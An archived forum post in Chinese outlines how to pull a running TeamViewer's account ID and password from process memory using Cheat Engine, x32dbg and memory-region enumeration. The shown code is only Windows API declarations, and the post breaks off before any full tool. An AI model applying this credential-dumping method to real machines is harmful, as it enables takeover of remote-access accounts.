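<!doctype html>
<!-- Archived copy of a Chinese-language forum article; lang on the root lets assistive tech and font fallback pick the right locale. -->
<html lang="zh-CN"><!--
Page saved with SingleFile
url: https://forum.butian.net/share/1029
--><meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- NOTE(review): the csrf-token below was captured from the archiving session's copy of the page, it is not
     authored content. It is the origin's anti-CSRF value for its own forms and is presumably session-bound
     (useless without the matching cookie), but it is still a captured secret-like value: strip it before
     redistributing the archive. -->
<meta name="csrf-token" content="47Je2DgOpWt2shRy4BwQ1k8Kv2Q2nhWSor3Tvjl1">
<title>Dump内存得到TeamViewer账号密码</title>
<meta name="keywords" content="奇安信,天眼,补天,漏洞,情报,攻防,安全">
<meta name="description" content="奇安信攻防社区-Dump内存得到TeamViewer账号密码">
<meta name="author" content="QIANXIN Team">
<meta name="copyright" content="2021 QIANXIN.com">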
<style>@media(max-width:767px){}</style>
<style>/*!
* Bootstrap v3.4.1 (https://getbootstrap.com/)
* Copyright 2011-2019 Twitter, Inc.
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}footer,nav{display:block}a{background-color:transparent}a:active,a:hover{outline:0}img{border:0}button,input,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button{text-transform:none}button{-webkit-appearance:button}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */@font-face{font-family:"Glyphicons Halflings";src:url(data:font/woff2;base64,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
<style>/*!
* Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:"FontAwesome";src:url(data:font/woff2;base64,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
<style>@media(min-width:1200px){.navbar-form{width:235px}}@media(min-width:768px){.navbar-form .form-control{width:100%}}@media(max-width:767px){.global-nav{width:100%;text-align:center;z-index:1000}}@media(max-width:767px){}.global-nav .nav{height:44px;padding:0}.navbar-form .btn{position:absolute;top:8px;right:30px;color:#999;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none}.navbar-form .btn:hover,.navbar-form .btn:focus{color:#777}pre{white-space:pre-wrap}@media(min-width:768px){}@media(min-width:992px){}@media(min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}button,input,textarea{font-family:inherit;font-size:inherit;line-height:inherit}ul{padding:0}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mb-50{margin-bottom:50px}.mt-10{margin-top:10px}.mt-15{margin-top:15px}.mt-20{margin-top:20px}.mt-30{margin-top:30px}.mt-60{margin-top:60px}.mr-5{margin-right:5px}.span-line{margin-left:8px;margin-right:8px;color:#999}.logo{float:left;margin:0;display:inline-block;width:150px}.logo a{display:block;height:50px;width:145px;background-image:url(
<style>a{color:#009a61;text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}.navbar-inverse{background-color:#2a8c70;border-color:#2b7a5c}.navbar-inverse .navbar-nav>li>a{color:#fff;padding-left:6px;padding-right:6px}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#008151}@media(max-width:767px){}@media(max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#e7f2ed;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}.btn-success{border-color:#4cae4c;background-color:#5cb85c;color:#fff}</style>
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-comment{color:green}.hljs-built_in,.hljs-keyword{color:#00f}.hljs-literal,.hljs-string,.hljs-title{color:#a31515}.hljs-meta{color:#2b91af}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#ffebe9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-d
efault:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#fff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body h2,.markdown-body h3{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body h3{font-weight:600;font-size:1.25em}.markdown-body ol{padding-left:2em}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0 !important}.markdown-body>*:last-child{margin-bottom:0 !important}.markdown-body p,.markdown-body ol,.markdown-body pre{margin-top:0;margin-bottom:16px}.markdown-body 
li+li{margin-top:.25em}.markdown-body code{border-radius:6px}.markdown-body pre code{font-size:100%}.markdown-body pre
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
<script src="/static/js/html5shiv.min.js"></script>
<script src="/static/js/respond.min.js"></script>
<![endif]-->
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) 
translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes 
bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
* Waves v0.7.5
* http://fian.my.id/Waves
*
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
* Released under the MIT license
* https://github.com/fians/Waves/blob/master/LICENSE
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes 
sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes 
swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
<body>
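<!-- Origin site navigation captured together with the article; every link is absolute to forum.butian.net. -->
<div class="global-nav mb-50">
<nav class="navbar navbar-inverse navbar-fixed-top" aria-label="Primary">
<div class="container nav">
<div class="visible-xs header-response sf-hidden">
</div>
<div class="row hidden-xs">
<div class="col-sm-8 col-md-8 col-lg-8">
<div class="navbar-header">
<!-- The collapse toggle was saved with no content (its icon spans are gone) and carries sf-hidden
     (presumably SingleFile's marker for elements hidden at capture time, verify); it keeps the
     data-toggle/data-target hooks, so it gets an explicit accessible name here. -->
<button type="button" class="navbar-toggle collapsed sf-hidden" data-toggle="collapse" data-target="#global-navbar" aria-label="切换导航">
</button>
<!-- NOTE(review): the brand link has no text; its image comes from CSS, so it has no accessible name of its own. -->
<div class="logo"><a class="navbar-brand logo" href="https://forum.butian.net/"></a></div>
</div>
<div class="collapse navbar-collapse" id="global-navbar">
<ul class="nav navbar-nav">
<li><a href="https://forum.butian.net/">首页 <span class="sr-only">(current)</span></a></li>
<li><a href="https://forum.butian.net/questions">问答</a></li>
<li><a href="https://forum.butian.net/shop">商城</a></li>
<li><a href="https://forum.butian.net/community">实战攻防技术</a></li>
<li><a href="https://forum.butian.net/movable">活动</a></li>
<li><a href="https://forum.butian.net/questions/Play">摸鱼办</a>
</li>
</ul>
<!-- Site search: submits GET https://forum.butian.net/search?word=… . The search box previously had no
     associated label (its name lived in a sibling sr-only span); the visually hidden label below binds it
     via for/id, and the magnifier span is decoration only, so it is hidden from assistive tech. -->
<form role="search" id="top-search-form" action="https://forum.butian.net/search" method="GET" class="navbar-form hidden-sm hidden-xs pull-right">
<label for="searchBox" class="sr-only">搜索</label>
<span class="btn btn-link" aria-hidden="true"><span class="glyphicon glyphicon-search"></span></span>
<input type="text" name="word" id="searchBox" class="form-control">
</form>
</div>
</div>
</div>
</div>
</nav>
</div>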
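<!-- Legacy-browser warning: only IE < 9 parses the conditional comment, so modern browsers see an empty container. -->
<div class="top-alert mt-60 clearfix text-center">
<!--[if lt IE 9]>
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
<a target="_blank" rel="noopener noreferrer" class="alert-link" href="http://browsehappy.com">立即升级</a>
</div>
<![endif]-->
</div>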
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">Dump内存得到TeamViewer账号密码</h3>
<ul class=taglist-inline>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/47>渗透测试</a></li>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
最近看到用窗体得到TV的账号密码在最新版不能用了
于是就想写个工具实现一下通过内存得到账号密码
## 0x01 通过CE搜索账号密码存在的内存块
类型设置为文本选择unicode编码多搜...
</div>
<textarea id=md_view_content style=display:none>最近看到用窗体得到TV的账号密码在最新版不能用了
于是就想写个工具实现一下通过内存得到账号密码
0x01 通过CE搜索账号密码存在的内存块
---------------------
类型设置为文本选择unicode编码多搜索几次找到这个值
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-cee5b5cfc809e9f79b87b64752845f48a5532f8f.png)
本来想的是应该有个指针直接指向密码,想把这个指针的基址找到就可以了,但是调了一下好像找不到这个基址
还有ID是不可以修改的定位也不方便想到遍历内存来得到ID和密码
再用CE搜索一下ID
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-6552de03131cbd86064ecbc8fca2beb682cbd2c5.png)
可以看到在密码的附近都是有很多ID
用的是遍历可以不用知道具体的位置剩下的就是要思考怎么让遍历的内存更准确遍历0000000-7FFF0000肯定是可以的但是这样会出现很多误报因为后面是准备使用正则匹配的难免会匹配到别的字符串
先用x32dbg查看下内存的属性
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-1449684b22d5daa6542c28d2264e009f0225eb9a.png)
从CE上看ID和密码就在这块内存里面这里有个特征就是这块内存的大小是1FF000后面会用到
那么思路就是先得到进程的基址然后遍历所有内存块基址找到一个1FF000大小的内存遍历内部内容得到ID密码这样遍历的内存也不会很大也可以降低匹配误差
0x02 需要用到的函数和结构
---------------
下面介绍一下需要用到的函数和结构
### ZwQueryVirtualMemory
```c++
typedef NTSTATUS(WINAPI* fnZwQueryVirtualMemory) (
HANDLE ProcessHandle, //进程句柄
PVOID BaseAddress, //内存地址
MEMORY_INFORMATION_CLASS MemoryInformationClass, //选择需要的内存信息,下面介绍
PVOID MemoryInformation, //指向MEMORY_BASIC_INFORMATION结构的指针
SIZE_T MemoryInformationLength, //MEMORY_BASIC_INFORMATION结构的大小
PSIZE_T ReturnLength //返回结构的大小
);
```
这个函数就是获取内存块的属性然后存放到MEMORY\_BASIC\_INFORMATION结构
### MemoryInformationClass
```c++
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
```
这是一个枚举类型选择需要什么内存信息这里需要遍历内存选择MemoryBasicInformation就可以
### MEMORY\_BASIC\_INFORMATION
```c++
typedef struct _MEMORY_BASIC_INFORMATION {
PVOID BaseAddress; //内存块的起始地址
PVOID AllocationBase; //指向VirtualAlloc函数等开辟的内存的地址的指针
DWORD AllocationProtect;
//内存块的初始属性,打个比方开了一块内存赋予RW属性就算后面用VirtualProtect修改为RWX这里也是RW是这个内存初始时候的属性
#if defined (_WIN64)
WORD PartitionId; //不知道msdn没写
#endif
SIZE_T RegionSize; //内存块的大小
DWORD State; //内存块的状态
DWORD Protect; //内存块当前的属性
DWORD Type; //内存块的类型
} MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;
```
